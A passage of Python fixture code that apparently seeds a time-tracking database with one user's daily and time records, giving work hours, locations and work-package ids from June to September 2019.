, end = '15:00'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '2'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '16:00'
, end = '17:00'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '17:00'
, end = '18:00'
, work_location = '2'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-18.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:30'
, work_location = '1'
, wp = '8'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '16:30'
, end = '17:00'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '15:30'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-19.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '1'
, wp = '4'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-20.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-21.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '14:00'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '2'
, wp = '14'
)
db.time_record.create \
( daily_record = dr
, start = '14:00'
, end = '15:00'
, work_location = '2'
, wp = '12'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-22.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-23.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-24.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '11:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '1'
, wp = '14'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-25.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '11'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '11:00'
, work_location = '1'
, wp = '11'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '16:45'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-26.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '11:00'
, work_location = '2'
, wp = '4'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '2'
, wp = '10'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-27.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '6'
)
db.time_record.create \
( daily_record = dr
, duration = 7.5
, work_location = '5'
, wp = '44'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-29.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-06-30.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-01.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '15'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-02.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-03.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '8'
)
db.time_record.create \
( daily_record = dr
, start = '08:15'
, end = '08:45'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '17:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '1'
, wp = '6'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-04.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '08:15'
, end = '08:45'
, work_location = '2'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '16:45'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, duration = 7.5
, work_location = '5'
, wp = '44'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-06.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-07.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-08.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '16:30'
, end = '17:30'
, work_location = '2'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-09.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:30'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:30'
, end = '12:00'
, work_location = '2'
, wp = '15'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-10.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '10:00'
, work_location = '1'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '17:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '10:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-11.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '1'
, wp = '15'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-12.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:30'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '10:00'
, work_location = '2'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '10:00'
, end = '12:00'
, work_location = '2'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-13.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-14.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-15.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:15'
, work_location = '5'
, wp = '2'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '5'
, wp = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-16.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '16:45'
, work_location = '2'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-17.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '16:45'
, work_location = '2'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-18.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '11:00'
, work_location = '2'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '2'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-19.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-20.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-21.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-22.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
, wp = '15'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-23.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '17'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '17'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '17:15'
, work_location = '2'
, wp = '17'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-24.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '17'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '11:00'
, work_location = '1'
, wp = '17'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '1'
, wp = '15'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-25.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '15'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-26.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '11:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '11:00'
, end = '12:00'
, work_location = '2'
, wp = '15'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-27.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-28.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-29.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '17:15'
, work_location = '2'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-30.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '07:15'
, end = '07:45'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-07-31.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-01.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '18:00'
, work_location = '2'
)
db.time_record.create \
( daily_record = dr
, start = '10:00'
, end = '12:00'
, work_location = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-02.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-03.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-04.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-05.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:00'
, work_location = '1'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-06.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '16:45'
, work_location = '2'
, wp = '15'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '1'
, wp = '15'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-07.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '16:15'
, end = '16:45'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '16:00'
, work_location = '1'
, wp = '18'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-08.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, duration = 7.5
, work_location = '5'
, wp = '44'
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '44'
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '44'
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '44'
)
db.time_record.create \
( daily_record = dr
, duration = 7.75
, work_location = '5'
, wp = '1'
)
db.time_record.create \
( daily_record = dr
, duration = 7.5
, work_location = '5'
, wp = '44'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-17.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-18.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-19.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '15:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '15:00'
, end = '17:00'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-20.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-21.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '18:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-22.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-23.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:30'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '16:30'
, end = '17:30'
, work_location = '1'
, wp = '12'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-24.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-25.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-26.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '14:45'
, work_location = '1'
, wp = '19'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '14:45'
, end = '15:45'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-27.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '1'
, wp = '19'
)
db.time_record.create \
( daily_record = dr
, start = '09:30'
, end = '11:30'
, work_location = '1'
, wp = '8'
)
db.time_record.create \
( daily_record = dr
, start = '11:30'
, end = '12:00'
, work_location = '1'
, wp = '19'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-28.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:30'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '10:15'
, work_location = '2'
, wp = '19'
)
db.time_record.create \
( daily_record = dr
, start = '10:15'
, end = '12:00'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '16:30'
, end = '18:00'
, work_location = '2'
, wp = '8'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-29.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '14:00'
, work_location = '1'
, wp = '8'
)
db.time_record.create \
( daily_record = dr
, start = '09:15'
, end = '12:00'
, work_location = '1'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '08:15'
, end = '08:45'
, work_location = '2'
, wp = '8'
)
db.time_record.create \
( daily_record = dr
, start = '14:00'
, end = '17:00'
, work_location = '1'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-30.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:30'
, work_location = '2'
, wp = '16'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
, wp = '16'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-08-31.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-01.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-02.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-03.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-04.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '2'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-05.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-06.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-07.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-08.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-09.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '09:15'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-10.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '18:00'
, work_location = '2'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-11.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-12.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-13.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
)
db.time_record.create \
( daily_record = dr
, start = '08:30'
, end = '12:00'
, work_location = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-14.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-15.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-16.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:15'
, work_location = '5'
, wp = '2'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '5'
, wp = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-17.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-18.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '18:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-19.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-20.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-21.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-22.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-23.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
